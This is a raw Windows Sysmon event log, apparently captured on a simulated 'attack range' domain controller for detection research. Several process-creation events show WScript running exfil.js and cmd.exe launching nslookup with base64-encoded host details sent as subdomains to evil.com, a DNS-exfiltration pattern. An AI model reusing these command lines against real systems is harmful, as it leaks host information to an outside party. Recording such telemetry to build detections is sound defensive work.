10341000x8000000000000000216072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.753{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.753{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8746-000000005F02}216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.753{2E1864BB-18E0-629A-6742-000000005F02}39763832C:\Windows\System32\WScript.exe{2E1864BB-1900-629A-8746-000000005F02}216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.763{2E1864BB-1900-629A-8746-000000005F02}216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluwwfq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.753{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfxnml.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.722{2E1864BB-1900-629A-8546-000000005F02}73647212C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8646-000000005F02}6688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.722{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.722{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.722{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.722{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.722{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8646-000000005F02}6688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.722{2E1864BB-1900-629A-8446-000000005F02}54088036C:\Windows\system32\cmd.exe{2E1864BB-1900-629A-8646-000000005F02}6688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.732{2E1864BB-1900-629A-8646-000000005F02}6688C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1900-629A-8446-000000005F02}5408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfxnml.tmp 2>&1 10341000x8000000000000000216059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.684{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-8546-000000005F02}7364C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.684{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-8546-000000005F02}7364C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.684{2E1864BB-1900-629A-8546-000000005F02}73647212C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8446-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.669{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8546-000000005F02}7364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.653{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8446-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.653{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.653{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.653{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.653{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.653{2E1864BB-18E0-629A-6742-000000005F02}39766492C:\Windows\System32\WScript.exe{2E1864BB-1900-629A-8446-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.665{2E1864BB-1900-629A-8446-000000005F02}5408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfxnml.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.653{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcqn.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.622{2E1864BB-1900-629A-8246-000000005F02}53805176C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8346-000000005F02}4712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.606{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8346-000000005F02}4712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 